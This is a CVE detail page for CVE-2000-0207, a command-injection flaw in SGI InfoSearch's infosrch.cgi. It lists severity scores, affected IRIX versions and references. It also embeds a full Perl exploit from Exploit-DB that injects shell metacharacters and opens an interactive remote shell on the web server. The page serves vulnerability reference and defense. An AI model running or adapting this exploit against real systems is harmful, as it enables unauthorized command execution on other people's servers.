CVE-2000-0207 : Detail

CVE-2000-0207

3.1%V3
Network
2000-04-10
02h00 +00:00
2005-11-02
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SGI InfoSearch CGI program infosrch.cgi allows remote attackers to execute commands via shell metacharacters.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19788

Publication date : 2000-03-04 23h00 +00:00
Author : rpc
EDB Verified : Yes

source: https://www.securityfocus.com/bid/1031/info The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users. #!/usr/bin/perl -w # infosearch.cgi interactive shell. # usage: ./infosh.pl hostname # 3/4/00 # --rpc <h@ckz.org> use IO::Socket; use CGI ":escape"; $|++; die "usage: $0 host\n" unless(@ARGV == 1); ($host) = shift @ARGV; $cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|"; # url encode and send a command. sub send_cmd { my($url_command) = $cgi . CGI::escape(shift); $s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp"); if(!$s) { die "denied.\n"; } print $s "GET $url_command HTTP/1.0\r\n"; print $s "User-Agent: \r\n\r\n"; @result = <$s>; shift @result until $result[0] =~ /^\r\n/; # uninteresting data. shift @result; $#result--; return @result; } # draw a pseudo prompt. i like "\h:\w \$ ". sub prompt { @res = send_cmd("/sbin/pwd"); chomp($pwd = $res[0]); print "$host:", $pwd, "\$ "; } prompt; while(!eof(STDIN)) { chomp($cmd = <STDIN>); print send_cmd($cmd); prompt; }

Products Mentioned

Configuraton 0

Sgi>>Infosearch >> Version 1.0

Sgi>>Irix >> Version 6.5

Sgi>>Irix >> Version 6.5.1

Sgi>>Irix >> Version 6.5.2m

Sgi>>Irix >> Version 6.5.3

Sgi>>Irix >> Version 6.5.3f

Sgi>>Irix >> Version 6.5.3m

Sgi>>Irix >> Version 6.5.4

Sgi>>Irix >> Version 6.5.6

Sgi>>Irix >> Version 6.5.7

References

http://www.securityfocus.com/bid/1031
Tags : vdb-entry, x_refsource_BID